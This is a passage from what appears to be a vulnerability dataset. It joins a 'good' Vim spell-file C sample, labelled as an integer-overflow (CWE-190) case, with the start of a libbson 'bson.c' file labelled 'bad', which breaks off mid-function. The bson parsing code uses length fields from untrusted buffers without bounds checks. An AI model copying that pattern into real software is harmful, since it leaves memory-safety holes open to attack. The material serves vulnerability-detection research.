EMSG(_("E754: Only up to 8 regions supported"));
else
{
/* Check for overwriting before doing things that may take a lot of
* time. */
if (!over_write && mch_stat((char *)wfname, &st) >= 0)
{
EMSG(_(e_exists));
goto theend;
}
if (mch_isdir(wfname))
{
EMSG2(_(e_isadir2), wfname);
goto theend;
}
fname = alloc(MAXPATHL);
if (fname == NULL)
goto theend;
/*
* Init the aff and dic pointers.
* Get the region names if there are more than 2 arguments.
*/
for (i = 0; i < incount; ++i)
{
afile[i] = NULL;
if (incount > 1)
{
len = (int)STRLEN(innames[i]);
if (STRLEN(gettail(innames[i])) < 5
|| innames[i][len - 3] != '_')
{
EMSG2(_("E755: Invalid region in %s"), innames[i]);
goto theend;
}
spin.si_region_name[i * 2] = TOLOWER_ASC(innames[i][len - 2]);
spin.si_region_name[i * 2 + 1] =
TOLOWER_ASC(innames[i][len - 1]);
}
}
spin.si_region_count = incount;
spin.si_foldroot = wordtree_alloc(&spin);
spin.si_keeproot = wordtree_alloc(&spin);
spin.si_prefroot = wordtree_alloc(&spin);
if (spin.si_foldroot == NULL
|| spin.si_keeproot == NULL
|| spin.si_prefroot == NULL)
{
free_blocks(spin.si_blocks);
goto theend;
}
/* When not producing a .add.spl file clear the character table when
* we encounter one in the .aff file. This means we dump the current
* one in the .spl file if the .aff file doesn't define one. That's
* better than guessing the contents, the table will match a
* previously loaded spell file. */
if (!spin.si_add)
spin.si_clear_chartab = TRUE;
/*
* Read all the .aff and .dic files.
* Text is converted to 'encoding'.
* Words are stored in the case-folded and keep-case trees.
*/
for (i = 0; i < incount && !error; ++i)
{
spin.si_conv.vc_type = CONV_NONE;
spin.si_region = 1 << i;
vim_snprintf((char *)fname, MAXPATHL, "%s.aff", innames[i]);
if (mch_stat((char *)fname, &st) >= 0)
{
/* Read the .aff file. Will init "spin->si_conv" based on the
* "SET" line. */
afile[i] = spell_read_aff(&spin, fname);
if (afile[i] == NULL)
error = TRUE;
else
{
/* Read the .dic file and store the words in the trees. */
vim_snprintf((char *)fname, MAXPATHL, "%s.dic",
innames[i]);
if (spell_read_dic(&spin, fname, afile[i]) == FAIL)
error = TRUE;
}
}
else
{
/* No .aff file, try reading the file as a word list. Store
* the words in the trees. */
if (spell_read_wordfile(&spin, innames[i]) == FAIL)
error = TRUE;
}
#ifdef FEAT_MBYTE
/* Free any conversion stuff. */
convert_setup(&spin.si_conv, NULL, NULL);
#endif
}
if (spin.si_compflags != NULL && spin.si_nobreak)
MSG(_("Warning: both compounding and NOBREAK specified"));
if (!error && !got_int)
{
/*
* Combine tails in the tree.
*/
spell_message(&spin, (char_u *)_(msg_compressing));
wordtree_compress(&spin, spin.si_foldroot);
wordtree_compress(&spin, spin.si_keeproot);
wordtree_compress(&spin, spin.si_prefroot);
}
if (!error && !got_int)
{
/*
* Write the info in the spell file.
*/
vim_snprintf((char *)IObuff, IOSIZE,
_("Writing spell file %s ..."), wfname);
spell_message(&spin, IObuff);
error = write_vim_spell(&spin, wfname) == FAIL;
spell_message(&spin, (char_u *)_("Done!"));
vim_snprintf((char *)IObuff, IOSIZE,
_("Estimated runtime memory use: %d bytes"), spin.si_memtot);
spell_message(&spin, IObuff);
/*
* If the file is loaded need to reload it.
*/
if (!error)
spell_reload_one(wfname, added_word);
}
/* Free the allocated memory. */
ga_clear(&spin.si_rep);
ga_clear(&spin.si_repsal);
ga_clear(&spin.si_sal);
ga_clear(&spin.si_map);
ga_clear(&spin.si_comppat);
ga_clear(&spin.si_prefcond);
hash_clear_all(&spin.si_commonwords, 0);
/* Free the .aff file structures. */
for (i = 0; i < incount; ++i)
if (afile[i] != NULL)
spell_free_aff(afile[i]);
/* Free all the bits and pieces at once. */
free_blocks(spin.si_blocks);
/*
* If there is soundfolding info and no NOSUGFILE item create the
* .sug file with the soundfolded word trie.
*/
if (spin.si_sugtime != 0 && !error && !got_int)
spell_make_sugfile(&spin, wfname);
}
theend:
vim_free(fname);
vim_free(wfname);
}
/*
* Display a message for spell file processing when 'verbose' is set or using
* ":mkspell". "str" can be IObuff.
*/
static void
spell_message(spellinfo_T *spin, char_u *str)
{
if (spin->si_verbose || p_verbose > 2)
{
if (!spin->si_verbose)
verbose_enter();
MSG(str);
out_flush();
if (!spin->si_verbose)
verbose_leave();
}
}
/*
* ":[count]spellgood {word}"
* ":[count]spellwrong {word}"
* ":[count]spellundo {word}"
*/
void
ex_spell(exarg_T *eap)
{
spell_add_word(eap->arg, (int)STRLEN(eap->arg), eap->cmdidx == CMD_spellwrong,
eap->forceit ? 0 : (int)eap->line2,
eap->cmdidx == CMD_spellundo);
}
/*
* Add "word[len]" to 'spellfile' as a good or bad word.
*/
void
spell_add_word(
char_u *word,
int len,
int bad,
int idx, /* "zG" and "zW": zero, otherwise index in
'spellfile' */
int undo) /* TRUE for "zug", "zuG", "zuw" and "zuW" */
{
FILE *fd = NULL;
buf_T *buf = NULL;
int new_spf = FALSE;
char_u *fname;
char_u *fnamebuf = NULL;
char_u line[MAXWLEN * 2];
long fpos, fpos_next = 0;
int i;
char_u *spf;
if (idx == 0) /* use internal wordlist */
{
if (int_wordlist == NULL)
{
int_wordlist = vim_tempname('s', FALSE);
if (int_wordlist == NULL)
return;
}
fname = int_wordlist;
}
else
{
/* If 'spellfile' isn't set figure out a good default value. */
if (*curwin->w_s->b_p_spf == NUL)
{
init_spellfile();
new_spf = TRUE;
}
if (*curwin->w_s->b_p_spf == NUL)
{
EMSG2(_(e_notset), "spellfile");
return;
}
fnamebuf = alloc(MAXPATHL);
if (fnamebuf == NULL)
return;
for (spf = curwin->w_s->b_p_spf, i = 1; *spf != NUL; ++i)
{
copy_option_part(&spf, fnamebuf, MAXPATHL, ",");
if (i == idx)
break;
if (*spf == NUL)
{
EMSGN(_("E765: 'spellfile' does not have %ld entries"), idx);
vim_free(fnamebuf);
return;
}
}
/* Check that the user isn't editing the .add file somewhere. */
buf = buflist_findname_exp(fnamebuf);
if (buf != NULL && buf->b_ml.ml_mfp == NULL)
buf = NULL;
if (buf != NULL && bufIsChanged(buf))
{
EMSG(_(e_bufloaded));
vim_free(fnamebuf);
return;
}
fname = fnamebuf;
}
if (bad || undo)
{
/* When the word appears as a good word we need to remove that one,
* since its flags sort before the one with WF_BANNED. */
fd = mch_fopen((char *)fname, "r");
if (fd != NULL)
{
while (!vim_fgets(line, MAXWLEN * 2, fd))
{
fpos = fpos_next;
fpos_next = ftell(fd);
if (STRNCMP(word, line, len) == 0
&& (line[len] == '/' || line[len] < ' '))
{
/* Found duplicate word. Remove it by writing a '#' at
* the start of the line. Mixing reading and writing
* doesn't work for all systems, close the file first. */
fclose(fd);
fd = mch_fopen((char *)fname, "r+");
if (fd == NULL)
break;
if (fseek(fd, fpos, SEEK_SET) == 0)
{
fputc('#', fd);
if (undo)
{
home_replace(NULL, fname, NameBuff, MAXPATHL, TRUE);
smsg((char_u *)_("Word '%.*s' removed from %s"),
len, word, NameBuff);
}
}
fseek(fd, fpos_next, SEEK_SET);
}
}
if (fd != NULL)
fclose(fd);
}
}
if (!undo)
{
fd = mch_fopen((char *)fname, "a");
if (fd == NULL && new_spf)
{
char_u *p;
/* We just initialized the 'spellfile' option and can't open the
* file. We may need to create the "spell" directory first. We
* already checked the runtime directory is writable in
* init_spellfile(). */
if (!dir_of_file_exists(fname) && (p = gettail_sep(fname)) != fname)
{
int c = *p;
/* The directory doesn't exist. Try creating it and opening
* the file again. */
*p = NUL;
vim_mkdir(fname, 0755);
*p = c;
fd = mch_fopen((char *)fname, "a");
}
}
if (fd == NULL)
EMSG2(_(e_notopen), fname);
else
{
if (bad)
fprintf(fd, "%.*s/!\n", len, word);
else
fprintf(fd, "%.*s\n", len, word);
fclose(fd);
home_replace(NULL, fname, NameBuff, MAXPATHL, TRUE);
smsg((char_u *)_("Word '%.*s' added to %s"), len, word, NameBuff);
}
}
if (fd != NULL)
{
/* Update the .add.spl file. */
mkspell(1, &fname, FALSE, TRUE, TRUE);
/* If the .add file is edited somewhere, reload it. */
if (buf != NULL)
buf_reload(buf, buf->b_orig_mode);
redraw_all_later(SOME_VALID);
}
vim_free(fnamebuf);
}
/*
* Initialize 'spellfile' for the current buffer.
*/
static void
init_spellfile(void)
{
char_u *buf;
int l;
char_u *fname;
char_u *rtp;
char_u *lend;
int aspath = FALSE;
char_u *lstart = curbuf->b_s.b_p_spl;
if (*curwin->w_s->b_p_spl != NUL && curwin->w_s->b_langp.ga_len > 0)
{
buf = alloc(MAXPATHL);
if (buf == NULL)
return;
/* Find the end of the language name. Exclude the region. If there
* is a path separator remember the start of the tail. */
for (lend = curwin->w_s->b_p_spl; *lend != NUL
&& vim_strchr((char_u *)",._", *lend) == NULL; ++lend)
if (vim_ispathsep(*lend))
{
aspath = TRUE;
lstart = lend + 1;
}
/* Loop over all entries in 'runtimepath'. Use the first one where we
* are allowed to write. */
rtp = p_rtp;
while (*rtp != NUL)
{
if (aspath)
/* Use directory of an entry with path, e.g., for
* "/dir/lg.utf-8.spl" use "/dir". */
vim_strncpy(buf, curbuf->b_s.b_p_spl,
lstart - curbuf->b_s.b_p_spl - 1);
else
/* Copy the path from 'runtimepath' to buf[]. */
copy_option_part(&rtp, buf, MAXPATHL, ",");
if (filewritable(buf) == 2)
{
/* Use the first language name from 'spelllang' and the
* encoding used in the first loaded .spl file. */
if (aspath)
vim_strncpy(buf, curbuf->b_s.b_p_spl,
lend - curbuf->b_s.b_p_spl);
else
{
/* Create the "spell" directory if it doesn't exist yet. */
l = (int)STRLEN(buf);
vim_snprintf((char *)buf + l, MAXPATHL - l, "/spell");
if (filewritable(buf) != 2)
vim_mkdir(buf, 0755);
l = (int)STRLEN(buf);
vim_snprintf((char *)buf + l, MAXPATHL - l,
"/%.*s", (int)(lend - lstart), lstart);
}
l = (int)STRLEN(buf);
fname = LANGP_ENTRY(curwin->w_s->b_langp, 0)
->lp_slang->sl_fname;
vim_snprintf((char *)buf + l, MAXPATHL - l, ".%s.add",
fname != NULL
&& strstr((char *)gettail(fname), ".ascii.") != NULL
? (char_u *)"ascii" : spell_enc());
set_option_value((char_u *)"spellfile", 0L, buf, OPT_LOCAL);
break;
}
aspath = FALSE;
}
vim_free(buf);
}
}
/*
* Set the spell character tables from strings in the affix file.
*/
static int
set_spell_chartab(char_u *fol, char_u *low, char_u *upp)
{
/* We build the new tables here first, so that we can compare with the
* previous one. */
spelltab_T new_st;
char_u *pf = fol, *pl = low, *pu = upp;
int f, l, u;
clear_spell_chartab(&new_st);
while (*pf != NUL)
{
if (*pl == NUL || *pu == NUL)
{
EMSG(_(e_affform));
return FAIL;
}
#ifdef FEAT_MBYTE
f = mb_ptr2char_adv(&pf);
l = mb_ptr2char_adv(&pl);
u = mb_ptr2char_adv(&pu);
#else
f = *pf++;
l = *pl++;
u = *pu++;
#endif
/* Every character that appears is a word character. */
if (f < 256)
new_st.st_isw[f] = TRUE;
if (l < 256)
new_st.st_isw[l] = TRUE;
if (u < 256)
new_st.st_isw[u] = TRUE;
/* if "LOW" and "FOL" are not the same the "LOW" char needs
* case-folding */
if (l < 256 && l != f)
{
if (f >= 256)
{
EMSG(_(e_affrange));
return FAIL;
}
new_st.st_fold[l] = f;
}
/* if "UPP" and "FOL" are not the same the "UPP" char needs
* case-folding, it's upper case and the "UPP" is the upper case of
* "FOL" . */
if (u < 256 && u != f)
{
if (f >= 256)
{
EMSG(_(e_affrange));
return FAIL;
}
new_st.st_fold[u] = f;
new_st.st_isu[u] = TRUE;
new_st.st_upper[f] = u;
}
}
if (*pl != NUL || *pu != NUL)
{
EMSG(_(e_affform));
return FAIL;
}
return set_spell_finish(&new_st);
}
/*
* Set the spell character tables from strings in the .spl file.
*/
static void
set_spell_charflags(
char_u *flags,
int cnt, /* length of "flags" */
char_u *fol)
{
/* We build the new tables here first, so that we can compare with the
* previous one. */
spelltab_T new_st;
int i;
char_u *p = fol;
int c;
clear_spell_chartab(&new_st);
for (i = 0; i < 128; ++i)
{
if (i < cnt)
{
new_st.st_isw[i + 128] = (flags[i] & CF_WORD) != 0;
new_st.st_isu[i + 128] = (flags[i] & CF_UPPER) != 0;
}
if (*p != NUL)
{
#ifdef FEAT_MBYTE
c = mb_ptr2char_adv(&p);
#else
c = *p++;
#endif
new_st.st_fold[i + 128] = c;
if (i + 128 != c && new_st.st_isu[i + 128] && c < 256)
new_st.st_upper[c] = i + 128;
}
}
(void)set_spell_finish(&new_st);
}
static int
set_spell_finish(spelltab_T *new_st)
{
int i;
if (did_set_spelltab)
{
/* check that it's the same table */
for (i = 0; i < 256; ++i)
{
if (spelltab.st_isw[i] != new_st->st_isw[i]
|| spelltab.st_isu[i] != new_st->st_isu[i]
|| spelltab.st_fold[i] != new_st->st_fold[i]
|| spelltab.st_upper[i] != new_st->st_upper[i])
{
EMSG(_("E763: Word characters differ between spell files"));
return FAIL;
}
}
}
else
{
/* copy the new spelltab into the one being used */
spelltab = *new_st;
did_set_spelltab = TRUE;
}
return OK;
}
/*
* Write the table with prefix conditions to the .spl file.
* When "fd" is NULL only count the length of what is written.
*/
static int
write_spell_prefcond(FILE *fd, garray_T *gap)
{
int i;
char_u *p;
int len;
int totlen;
size_t x = 1; /* collect return value of fwrite() */
if (fd != NULL)
put_bytes(fd, (long_u)gap->ga_len, 2); /* <prefcondcnt> */
totlen = 2 + gap->ga_len; /* length of <prefcondcnt> and <condlen> bytes */
for (i = 0; i < gap->ga_len; ++i)
{
/* <prefcond> : <condlen> <condstr> */
p = ((char_u **)gap->ga_data)[i];
if (p != NULL)
{
len = (int)STRLEN(p);
if (fd != NULL)
{
fputc(len, fd);
x &= fwrite(p, (size_t)len, (size_t)1, fd);
}
totlen += len;
}
else if (fd != NULL)
fputc(0, fd);
}
return totlen;
}
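/*
* Illustrative worked example (added note, not from the original source):
* for a growarray holding the two conditions "[a-z]" and NULL, the function
* writes the two-byte <prefcondcnt> for 2 entries, then the length byte 5
* followed by the five bytes of "[a-z]", then a single zero length byte for
* the NULL entry, and returns totlen == 2 + 2 + 5 == 9.
*/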
/*
* Use map string "map" for languages "lp".
*/
static void
set_map_str(slang_T *lp, char_u *map)
{
char_u *p;
int headc = 0;
int c;
int i;
if (*map == NUL)
{
lp->sl_has_map = FALSE;
return;
}
lp->sl_has_map = TRUE;
/* Init the array and hash tables empty. */
for (i = 0; i < 256; ++i)
lp->sl_map_array[i] = 0;
#ifdef FEAT_MBYTE
hash_init(&lp->sl_map_hash);
#endif
/*
* The similar characters are stored separated with slashes:
* "aaa/bbb/ccc/". Fill sl_map_array[c] with the character before c and
* before the same slash. For characters above 255 sl_map_hash is used.
*/
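/*
* Illustrative worked example (added note, not from the original source):
* for the hypothetical MAP string "ax/by/" the loop below sets
* sl_map_array['a'] = 'a', sl_map_array['x'] = 'a', sl_map_array['b'] = 'b'
* and sl_map_array['y'] = 'b'; a character with a value of 256 or more would
* instead be stored in sl_map_hash as "<char> NUL <headchar> NUL".
*/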
for (p = map; *p != NUL; )
{
#ifdef FEAT_MBYTE
c = mb_cptr2char_adv(&p);
#else
c = *p++;
#endif
if (c == '/')
headc = 0;
else
{
if (headc == 0)
headc = c;
#ifdef FEAT_MBYTE
/* Characters above 255 don't fit in sl_map_array[], put them in
* the hash table. Each entry is the char, a NUL, the headchar and
* a NUL. */
if (c >= 256)
{
int cl = mb_char2len(c);
int headcl = mb_char2len(headc);
char_u *b;
hash_T hash;
hashitem_T *hi;
b = alloc((unsigned)(cl + headcl + 2));
if (b == NULL)
return;
mb_char2bytes(c, b);
b[cl] = NUL;
mb_char2bytes(headc, b + cl + 1);
b[cl + 1 + headcl] = NUL;
hash = hash_hash(b);
hi = hash_lookup(&lp->sl_map_hash, b, hash);
if (HASHITEM_EMPTY(hi))
hash_add_item(&lp->sl_map_hash, hi, b, hash);
else
{
/* This should have been checked when generating the .spl
* file. */
EMSG(_("E783: duplicate char in MAP entry"));
vim_free(b);
}
}
else
#endif
lp->sl_map_array[c] = headc;
}
}
}
#endif /* FEAT_SPELL */
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_3153_0 |
crossvul-cpp_data_bad_3983_1 | /* bson.c */
/* Copyright 2009, 2010 10gen Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <time.h>
#include <limits.h>
#include "bson.h"
#include "encoding.h"
const int initialBufferSize = 128;
/* only need one of these */
static const int zero = 0;
/* Custom standard function pointers. */
void *( *bson_malloc_func )( size_t ) = malloc;
void *( *bson_realloc_func )( void *, size_t ) = realloc;
void ( *bson_free_func )( void * ) = free;
#ifdef R_SAFETY_NET
bson_printf_func bson_printf;
#else
bson_printf_func bson_printf = printf;
#endif
bson_fprintf_func bson_fprintf = fprintf;
bson_sprintf_func bson_sprintf = sprintf;
static int _bson_errprintf( const char *, ... );
bson_printf_func bson_errprintf = _bson_errprintf;
/* ObjectId fuzz functions. */
static int ( *oid_fuzz_func )( void ) = NULL;
static int ( *oid_inc_func )( void ) = NULL;
/* ----------------------------
READING
------------------------------ */
MONGO_EXPORT bson* bson_create( void ) {
return (bson*)bson_malloc(sizeof(bson));
}
MONGO_EXPORT void bson_dispose(bson* b) {
bson_free(b);
}
MONGO_EXPORT bson *bson_empty( bson *obj ) {
static char *data = "\005\0\0\0\0";
bson_init_data( obj, data );
obj->finished = 1;
obj->err = 0;
obj->errstr = NULL;
obj->stackPos = 0;
return obj;
}
MONGO_EXPORT int bson_copy( bson *out, const bson *in ) {
if ( !out || !in ) return BSON_ERROR;
if ( !in->finished ) return BSON_ERROR;
bson_init_size( out, bson_size( in ) );
memcpy( out->data, in->data, bson_size( in ) );
out->finished = 1;
return BSON_OK;
}
int bson_init_data( bson *b, char *data ) {
b->data = data;
return BSON_OK;
}
int bson_init_finished_data( bson *b, char *data ) {
bson_init_data( b, data );
b->finished = 1;
return BSON_OK;
}
static void _bson_reset( bson *b ) {
b->finished = 0;
b->stackPos = 0;
b->err = 0;
b->errstr = NULL;
}
MONGO_EXPORT int bson_size( const bson *b ) {
int i;
if ( ! b || ! b->data )
return 0;
bson_little_endian32( &i, b->data );
return i;
}
MONGO_EXPORT int bson_buffer_size( const bson *b ) {
return (b->cur - b->data + 1);
}
MONGO_EXPORT const char *bson_data( const bson *b ) {
return (const char *)b->data;
}
static char hexbyte( char hex ) {
if (hex >= '0' && hex <= '9')
return (hex - '0');
else if (hex >= 'A' && hex <= 'F')
return (hex - 'A' + 10);
else if (hex >= 'a' && hex <= 'f')
return (hex - 'a' + 10);
else
return 0x0;
}
MONGO_EXPORT void bson_oid_from_string( bson_oid_t *oid, const char *str ) {
int i;
for ( i=0; i<12; i++ ) {
oid->bytes[i] = ( hexbyte( str[2*i] ) << 4 ) | hexbyte( str[2*i + 1] );
}
}
MONGO_EXPORT void bson_oid_to_string( const bson_oid_t *oid, char *str ) {
static const char hex[16] = {'0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f'};
int i;
for ( i=0; i<12; i++ ) {
str[2*i] = hex[( oid->bytes[i] & 0xf0 ) >> 4];
str[2*i + 1] = hex[ oid->bytes[i] & 0x0f ];
}
str[24] = '\0';
}
MONGO_EXPORT void bson_set_oid_fuzz( int ( *func )( void ) ) {
oid_fuzz_func = func;
}
MONGO_EXPORT void bson_set_oid_inc( int ( *func )( void ) ) {
oid_inc_func = func;
}
MONGO_EXPORT void bson_oid_gen( bson_oid_t *oid ) {
static int incr = 0;
static int fuzz = 0;
int i;
time_t t = time( NULL );
if( oid_inc_func )
i = oid_inc_func();
else
i = incr++;
if ( !fuzz ) {
if ( oid_fuzz_func )
fuzz = oid_fuzz_func();
else {
srand( ( int )t );
fuzz = rand();
}
}
bson_big_endian32( &oid->ints[0], &t );
oid->ints[1] = fuzz;
bson_big_endian32( &oid->ints[2], &i );
}
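/*
* Added note (not from the original source): the 12-byte OID produced above
* is laid out as a big-endian 4-byte timestamp, then the 4-byte "fuzz" value
* that is generated only once, then a big-endian 4-byte counter.
*/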
MONGO_EXPORT time_t bson_oid_generated_time( bson_oid_t *oid ) {
time_t out;
bson_big_endian32( &out, &oid->ints[0] );
return out;
}
MONGO_EXPORT void bson_print( const bson *b ) {
bson_print_raw( b->data , 0 );
}
MONGO_EXPORT void bson_print_raw( const char *data , int depth ) {
bson_iterator i;
const char *key;
int temp;
bson_timestamp_t ts;
char oidhex[25];
bson scope;
bson_iterator_from_buffer( &i, data );
while ( bson_iterator_next( &i ) ) {
bson_type t = bson_iterator_type( &i );
if ( t == 0 )
break;
key = bson_iterator_key( &i );
for ( temp=0; temp<=depth; temp++ )
bson_printf( "\t" );
bson_printf( "%s : %d \t " , key , t );
switch ( t ) {
case BSON_DOUBLE:
bson_printf( "%f" , bson_iterator_double( &i ) );
break;
case BSON_STRING:
bson_printf( "%s" , bson_iterator_string( &i ) );
break;
case BSON_SYMBOL:
bson_printf( "SYMBOL: %s" , bson_iterator_string( &i ) );
break;
case BSON_OID:
bson_oid_to_string( bson_iterator_oid( &i ), oidhex );
bson_printf( "%s" , oidhex );
break;
case BSON_BOOL:
bson_printf( "%s" , bson_iterator_bool( &i ) ? "true" : "false" );
break;
case BSON_DATE:
bson_printf( "%ld" , ( long int )bson_iterator_date( &i ) );
break;
case BSON_BINDATA:
bson_printf( "BSON_BINDATA" );
break;
case BSON_UNDEFINED:
bson_printf( "BSON_UNDEFINED" );
break;
case BSON_NULL:
bson_printf( "BSON_NULL" );
break;
case BSON_REGEX:
bson_printf( "BSON_REGEX: %s", bson_iterator_regex( &i ) );
break;
case BSON_CODE:
bson_printf( "BSON_CODE: %s", bson_iterator_code( &i ) );
break;
case BSON_CODEWSCOPE:
bson_printf( "BSON_CODE_W_SCOPE: %s", bson_iterator_code( &i ) );
/* bson_init( &scope ); */ /* review - stepped on by bson_iterator_code_scope? */
bson_iterator_code_scope( &i, &scope );
bson_printf( "\n\t SCOPE: " );
bson_print( &scope );
/* bson_destroy( &scope ); */ /* review - causes free error */
break;
case BSON_INT:
bson_printf( "%d" , bson_iterator_int( &i ) );
break;
case BSON_LONG:
bson_printf( "%lld" , ( uint64_t )bson_iterator_long( &i ) );
break;
case BSON_TIMESTAMP:
ts = bson_iterator_timestamp( &i );
bson_printf( "i: %d, t: %d", ts.i, ts.t );
break;
case BSON_OBJECT:
case BSON_ARRAY:
bson_printf( "\n" );
bson_print_raw( bson_iterator_value( &i ) , depth + 1 );
break;
default:
bson_errprintf( "can't print type : %d\n" , t );
}
bson_printf( "\n" );
}
}
/* ----------------------------
ITERATOR
------------------------------ */
MONGO_EXPORT bson_iterator* bson_iterator_create( void ) {
return ( bson_iterator* )malloc( sizeof( bson_iterator ) );
}
MONGO_EXPORT void bson_iterator_dispose(bson_iterator* i) {
free(i);
}
MONGO_EXPORT void bson_iterator_init( bson_iterator *i, const bson *b ) {
i->cur = b->data + 4;
i->first = 1;
}
MONGO_EXPORT void bson_iterator_from_buffer( bson_iterator *i, const char *buffer ) {
i->cur = buffer + 4;
i->first = 1;
}
MONGO_EXPORT bson_type bson_find( bson_iterator *it, const bson *obj, const char *name ) {
bson_iterator_init( it, (bson *)obj );
while( bson_iterator_next( it ) ) {
if ( strcmp( name, bson_iterator_key( it ) ) == 0 )
break;
}
return bson_iterator_type( it );
}
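/* Illustrative usage sketch (added note, not from the original source), with
* a hypothetical finished bson object "b":
*
* bson_iterator it;
* if ( bson_find( &it, &b, "age" ) == BSON_INT )
* printf( "age = %d\n", bson_iterator_int( &it ) );
*
* bson_find returns BSON_EOO when no field with the given name exists.
*/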
MONGO_EXPORT bson_bool_t bson_iterator_more( const bson_iterator *i ) {
return *( i->cur );
}
MONGO_EXPORT bson_type bson_iterator_next( bson_iterator *i ) {
int ds;
if ( i->first ) {
i->first = 0;
return ( bson_type )( *i->cur );
}
switch ( bson_iterator_type( i ) ) {
case BSON_EOO:
return BSON_EOO; /* don't advance */
case BSON_UNDEFINED:
case BSON_NULL:
ds = 0;
break;
case BSON_BOOL:
ds = 1;
break;
case BSON_INT:
ds = 4;
break;
case BSON_LONG:
case BSON_DOUBLE:
case BSON_TIMESTAMP:
case BSON_DATE:
ds = 8;
break;
case BSON_OID:
ds = 12;
break;
case BSON_STRING:
case BSON_SYMBOL:
case BSON_CODE:
ds = 4 + bson_iterator_int_raw( i );
break;
case BSON_BINDATA:
ds = 5 + bson_iterator_int_raw( i );
break;
case BSON_OBJECT:
case BSON_ARRAY:
case BSON_CODEWSCOPE:
ds = bson_iterator_int_raw( i );
break;
case BSON_DBREF:
ds = 4+12 + bson_iterator_int_raw( i );
break;
case BSON_REGEX: {
const char *s = bson_iterator_value( i );
const char *p = s;
p += strlen( p )+1;
p += strlen( p )+1;
ds = p-s;
break;
}
default: {
char msg[] = "unknown type: 000000000000";
bson_numstr( msg+14, ( unsigned )( i->cur[0] ) );
bson_fatal_msg( 0, msg );
return 0;
}
}
i->cur += 1 + strlen( i->cur + 1 ) + 1 + ds;
return ( bson_type )( *i->cur );
}
MONGO_EXPORT bson_type bson_iterator_type( const bson_iterator *i ) {
return ( bson_type )i->cur[0];
}
MONGO_EXPORT const char *bson_iterator_key( const bson_iterator *i ) {
return i->cur + 1;
}
MONGO_EXPORT const char *bson_iterator_value( const bson_iterator *i ) {
const char *t = i->cur + 1;
t += strlen( t ) + 1;
return t;
}
/* types */
int bson_iterator_int_raw( const bson_iterator *i ) {
int out;
bson_little_endian32( &out, bson_iterator_value( i ) );
return out;
}
double bson_iterator_double_raw( const bson_iterator *i ) {
double out;
bson_little_endian64( &out, bson_iterator_value( i ) );
return out;
}
int64_t bson_iterator_long_raw( const bson_iterator *i ) {
int64_t out;
bson_little_endian64( &out, bson_iterator_value( i ) );
return out;
}
bson_bool_t bson_iterator_bool_raw( const bson_iterator *i ) {
return bson_iterator_value( i )[0];
}
MONGO_EXPORT bson_oid_t *bson_iterator_oid( const bson_iterator *i ) {
return ( bson_oid_t * )bson_iterator_value( i );
}
MONGO_EXPORT int bson_iterator_int( const bson_iterator *i ) {
switch ( bson_iterator_type( i ) ) {
case BSON_INT:
return bson_iterator_int_raw( i );
case BSON_LONG:
return bson_iterator_long_raw( i );
case BSON_DOUBLE:
return bson_iterator_double_raw( i );
default:
return 0;
}
}
MONGO_EXPORT double bson_iterator_double( const bson_iterator *i ) {
switch ( bson_iterator_type( i ) ) {
case BSON_INT:
return bson_iterator_int_raw( i );
case BSON_LONG:
return bson_iterator_long_raw( i );
case BSON_DOUBLE:
return bson_iterator_double_raw( i );
default:
return 0;
}
}
MONGO_EXPORT int64_t bson_iterator_long( const bson_iterator *i ) {
switch ( bson_iterator_type( i ) ) {
case BSON_INT:
return bson_iterator_int_raw( i );
case BSON_LONG:
return bson_iterator_long_raw( i );
case BSON_DOUBLE:
return bson_iterator_double_raw( i );
default:
return 0;
}
}
MONGO_EXPORT bson_timestamp_t bson_iterator_timestamp( const bson_iterator *i ) {
bson_timestamp_t ts;
bson_little_endian32( &( ts.i ), bson_iterator_value( i ) );
bson_little_endian32( &( ts.t ), bson_iterator_value( i ) + 4 );
return ts;
}
MONGO_EXPORT int bson_iterator_timestamp_time( const bson_iterator *i ) {
int time;
bson_little_endian32( &time, bson_iterator_value( i ) + 4 );
return time;
}
MONGO_EXPORT int bson_iterator_timestamp_increment( const bson_iterator *i ) {
int increment;
bson_little_endian32( &increment, bson_iterator_value( i ) );
return increment;
}
MONGO_EXPORT bson_bool_t bson_iterator_bool( const bson_iterator *i ) {
switch ( bson_iterator_type( i ) ) {
case BSON_BOOL:
return bson_iterator_bool_raw( i );
case BSON_INT:
return bson_iterator_int_raw( i ) != 0;
case BSON_LONG:
return bson_iterator_long_raw( i ) != 0;
case BSON_DOUBLE:
return bson_iterator_double_raw( i ) != 0;
case BSON_EOO:
case BSON_NULL:
return 0;
default:
return 1;
}
}
MONGO_EXPORT const char *bson_iterator_string( const bson_iterator *i ) {
switch ( bson_iterator_type( i ) ) {
case BSON_STRING:
case BSON_SYMBOL:
return bson_iterator_value( i ) + 4;
default:
return "";
}
}
int bson_iterator_string_len( const bson_iterator *i ) {
return bson_iterator_int_raw( i );
}
MONGO_EXPORT const char *bson_iterator_code( const bson_iterator *i ) {
switch ( bson_iterator_type( i ) ) {
case BSON_STRING:
case BSON_CODE:
return bson_iterator_value( i ) + 4;
case BSON_CODEWSCOPE:
return bson_iterator_value( i ) + 8;
default:
return NULL;
}
}
MONGO_EXPORT void bson_iterator_code_scope( const bson_iterator *i, bson *scope ) {
if ( bson_iterator_type( i ) == BSON_CODEWSCOPE ) {
int code_len;
bson_little_endian32( &code_len, bson_iterator_value( i )+4 );
bson_init_data( scope, ( void * )( bson_iterator_value( i )+8+code_len ) );
_bson_reset( scope );
scope->finished = 1;
}
else {
bson_empty( scope );
}
}
MONGO_EXPORT bson_date_t bson_iterator_date( const bson_iterator *i ) {
return bson_iterator_long_raw( i );
}
MONGO_EXPORT time_t bson_iterator_time_t( const bson_iterator *i ) {
return bson_iterator_date( i ) / 1000;
}
MONGO_EXPORT int bson_iterator_bin_len( const bson_iterator *i ) {
return ( bson_iterator_bin_type( i ) == BSON_BIN_BINARY_OLD )
? bson_iterator_int_raw( i ) - 4
: bson_iterator_int_raw( i );
}
MONGO_EXPORT char bson_iterator_bin_type( const bson_iterator *i ) {
return bson_iterator_value( i )[4];
}
MONGO_EXPORT const char *bson_iterator_bin_data( const bson_iterator *i ) {
return ( bson_iterator_bin_type( i ) == BSON_BIN_BINARY_OLD )
